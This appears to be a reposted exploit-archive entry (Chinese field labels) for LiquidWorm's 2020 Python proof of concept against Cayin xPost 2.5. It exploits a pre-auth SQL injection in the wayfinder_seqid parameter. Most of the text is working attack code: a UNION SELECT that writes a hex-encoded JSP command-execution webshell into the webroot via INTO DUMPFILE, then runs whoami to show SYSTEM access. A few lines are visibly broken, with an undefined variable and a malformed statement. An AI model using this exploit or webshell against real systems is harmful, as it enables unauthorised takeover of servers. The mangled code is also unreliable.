Cayin Digital Signage System xPost 2.5 – Remote Command Injection

  • 作者: LiquidWorm
    日期: 2020-06-04
  • 类别:
  • 来源:
  • # Title: Cayin Digital Signage System xPost 2.5 - Remote Command Injection
    # Author:LiquidWorm
    # Date: 2020-06-04
    # Vendor:
    # CVE:N/A
    #!/usr/bin/env python3
    # Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution
    # Vendor: CAYIN Technology Co., Ltd.
    # Product web page:
    # Affected version: 2.5.18103
    # 2.0
    # 1.0
    # Summary: CAYIN xPost is the web-based application software, which offers a
    # combination of essential tools to create rich contents for digital signage in
    # different vertical markets. It provides an easy-to-use platform for instant
    # data entry and further extends the usage of CAYIN SMP players to meet users'
    # requirements of frequent, daily maintenance.
    # Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability.
    # Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp
    # is not properly sanitised before being returned to the user or used in SQL queries.
    # This can be exploited to manipulate SQL queries by injecting arbitrary SQL code
    # and execute SYSTEM commands.
    # --------------------------------------------------------------------------------
    # lqwrm@zslab:~$ python3
    # # Injecting...
    # # Executing...
    # Command: whoami
    # nt authority\system
    # You have a webshell @
    # lqwrm@zslab:~$
    # --------------------------------------------------------------------------------
    # Tested on: Microsoft Windows 10 Home
    #Microsoft Windows 8.1
    #Microsoft Windows Server 2016
    #Microsoft Windows Server 2012
    #Microsoft Windows 7 Ultimate SP1
    #Apache Tomcat/9.0.1
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    # @zeroscience
    # Advisory ID: ZSL-2020-5571
    # Advisory URL:
    # 15.05.2020
    import requests as req
    import time as vremeto
    import sys as sistemot
    import re as regularno
    if len(sistemot.argv) < 2:
    print("Cayin xPost 2.5 Pre-Auth SQLi RCE")
    print("Usage: ./ ip:port")
    ip = sistemot.argv[1]
    filename = "thricer.jsp"
    urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid="
    constr = "-251' UNION ALL SELECT "
    print("# Injecting...")
    cmdjsp= "0x3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612"
    cmdjsp += "e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d64"
    cmdjsp += "2e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0"
    cmdjsp += "a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f"
    cmdjsp += "323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484"
    cmdjsp += "f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c"
    cmdjsp += "494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e505"
    cmdjsp += "55420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f"
    cmdjsp += "524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657"
    cmdjsp += "465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e70"
    cmdjsp += "72696e746c6e2822436f6d6d616e643a2022202b20726571756573742e67657450617"
    cmdjsp += "2616d657465722822636d642229202b20223c42523e22293b0a202020202020202050"
    cmdjsp += "726f636573732070203d2052756e74696d652e67657452756e74696d6528292e65786"
    cmdjsp += "56328726571756573742e676574506172616d657465722822636d642229293b0a2020"
    cmdjsp += "2020202020204f757470757453747265616d206f73203d20702e6765744f757470757"
    cmdjsp += "453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d"
    cmdjsp += "20702e676574496e70757453747265616d28293b0a202020202020202044617461496"
    cmdjsp += "e70757453747265616d20646973203d206e65772044617461496e7075745374726561"
    cmdjsp += "6d28696e293b0a2020202020202020537472696e672064697372203d206469732e726"
    cmdjsp += "561644c696e6528293b0a20202020202020207768696c652028206469737220213d20"
    cmdjsp += "6e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746"
    cmdjsp += "c6e2864697372293b200a2020202020202020202020202020202064697372203d2064"
    cmdjsp += "69732e726561644c696e6528293b200a202020202020202020202020202020207d0a2"
    cmdjsp += "0202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a"
    cmdjsp += "0a0a"
    sqlwrite = "INTO DUMPFILE 'C:/CayinApps/webapps/" + filename + "'-- -"
    mysqli = constr + cmdjsp + columns + sqlwrite
    r = req.get("http://" + ip + urlpath + mysqli, allow_redirects = True)
    print("# Executing...")
    r = req.get("http://" + ip + "/" + filename + "?cmd=whoami")
    clean = regularno.compile("<pre>(.*)</pre>", flags = regularno.S).search(r.text)
    clean ="<BR>", "\n")
    print("You have a webshell @ http://" + ip + "/" + filename)